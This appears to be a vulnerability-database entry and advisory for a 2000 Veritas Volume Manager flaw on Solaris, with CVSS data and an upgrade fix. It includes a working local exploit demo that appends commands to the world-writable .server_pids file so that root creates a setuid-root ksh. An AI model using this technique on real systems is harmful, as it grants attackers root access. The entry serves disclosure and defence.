发布时间 :2000-06-16 00:00:00
修订时间 :2008-09-10 15:04:48

[原文]Veritas Volume Manager creates a world writable .server_pids file, which allows local users to add arbitrary commands into the file, which is then executed by the vmsa_server script.

[CNNVD]Veritas Volume Manager命令添加漏洞(CNNVD-200006-068)

        Veritas Volume Manager创建了全局可写的.server_pids文件。本地用户用户利用此漏洞可以在文件中添加任意命令,然后被vmsa_server执行。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000616 Veritas Volume Manager 3.0.x hole

- 漏洞信息

Veritas Volume Manager命令添加漏洞
高危 未知
2000-06-16 00:00:00 2006-03-27 00:00:00
        Veritas Volume Manager创建了全局可写的.server_pids文件。本地用户用户利用此漏洞可以在文件中添加任意命令,然后被vmsa_server执行。

- 公告与补丁


- 漏洞信息 (20018)

Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 File Permission Vulnerability (EDBID:20018)
solaris local
2000-06-16 Verified
0 Dixie Flatline
N/A [点击下载]

A vulnerability exists in the Volume Manager product, versions 3.0.x, from Veritas Software. Volume Manager is a popular disk management package. Volume Manager running on Solaris platforms prior to Solaris 8 are vulnerable.

Upon startup, the /etc/rc2.d/S96vmsa-server script is executed. It never explicitly sets a umask, and therefore inherits the parent umask, which is unset. When the server starts, it creates a file named .server_pids, in the directory /var/opt/vmsa/logs. As no umask is set, its permissions are set to 666. (user, group and world readable and writable).

The control script used to control various aspects of the Storage Administrator server will, upon getting a request to stop the server, execute the contents of the .server_pids file. As any user can alter the contents of the .server_pids file, a would be attacker can execute arbitrary commands by placing them in the .server_pids file, and waiting for an administrator to call the stop routine of the control script (/opt/VRTSvmsa/bin/vmsa_server). This will cause the code in the .server_pids file to be executed as the user running the script. In most cases this will be root.

This vulnerability requires that the administrator run the vmsa_server script with the stop command. It will not be invoked upon a shutdown.

Solaris 8 machines are not susceptible to this vulnerability, as the umask of the system is set to 022 prior to the execution of the /etc/rc2.d/S96vmsa-server script. As a result, the .server_pids file is created non-world and non-group writable, and the contents of this file cannot be altered. 

foo@bar> id
uid=500(foo) gid=25(programmers)
foo@bar> ls -alt /var/opt/vmsa/logs/.server_pids
-rw-rw-rw- 1 root root 27 Jun 8 16:06 /var/opt/vmsa/logs/.server_pids
foo@bar> cat >> /var/opt/vmsa/logs/.server_pids
cp /bin/ksh /var/tmp; chmod 4755 /var/tmp/ksh
foo@bar> cat /var/opt/vmsa/logs/.server_pids
kill 328
kill 329
kill 337
cp /bin/ksh /var/tmp; chmod 4755 /var/tmp/ksh

# wait for root to stop the server manually

root@bar> /opt/VRTSvmsa/bin/vmsa_server -k
Stopping VERITAS VM Storage Administrator Server
root@bar> ls -alt /var/tmp
total 406
drwxrwxrwt 2 sys sys 512 Jun 8 17:46 .
-rwsr-xr-x 1 root other 192764 Jun 8 17:46 ksh
-rw------- 1 root root 387 Jun 8 17:46 wsconAAArqayVa:0.0
drwxr-xr-x 26 root sys 512 Jun 8 09:51 ..

# as an unprivileged user, run the suid-root shell we just created...

foo@bar> /var/tmp/ksh
# id
uid=500(foo) gid=25(programmers) euid=0(root)

- 漏洞信息

VERITAS Volume Manager vmsa_server Arbitrary Command Execution
Local Access Required Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-06-16 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete